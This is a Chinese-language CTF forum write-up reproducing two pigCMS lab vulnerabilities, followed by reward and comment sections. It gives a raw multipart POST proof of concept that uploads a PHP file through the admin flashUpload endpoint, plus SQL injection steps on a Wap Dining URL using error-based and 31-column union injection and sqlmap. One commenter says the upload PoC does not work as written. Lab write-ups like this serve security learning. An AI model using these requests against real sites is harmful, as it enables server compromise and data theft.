pigCMS靶场复现
一,任意文件上传,构造数据包
[POC]
POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----aaaContent-Length: 142------aaaContent-Disposition: form-data; name="filePath"; filename="demo1.php"Content-Type: video/x-flv<?php phpinfo();?>------aaa
上传成功
拼接路径访问
http://127.0.0.1/cms/upload/images/2023/09/25/1695620019Vzzm.php
二,sql注入
1,报错注入
http://127.0.0.1/index.php?g=Wap&m=Dining&a=ShowDetail&id=3
添加单引号报错
使用报错注入查看版本号
使用sqlmap读取数据库
2,联合注入
31正常
32报错,因此存在31个字段
显错位在6,7,12
查询数据库,用户名,版本号
后续可以根据information_schema表进行查询,也可以直接丢到sqlmap
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| Track-魔方 | 300.00 | 0 | 2023-09-25 20:08:57 | WriteUp奖励 300 |
打赏我,让我更有动力~
登录后才可发表内容
返回首页
CTF&WP专版
Track-魔方
发表于 2023-9-25
手速相当快,
评论列表
加载数据中...
Track-魔方
发表于 2023-9-25
格式上再优化优化,比如加个三级标题啥的,SQL注入那里,还可以用联合注入,可以写一写,改一改我直接通过了
评论列表
加载数据中...
成风
发表于 7个月前
建议写一下这些接口怎么来的
评论列表
加载数据中...
成风
发表于 7个月前
文件上传的poc不能直接用,有问题
评论列表
加载数据中...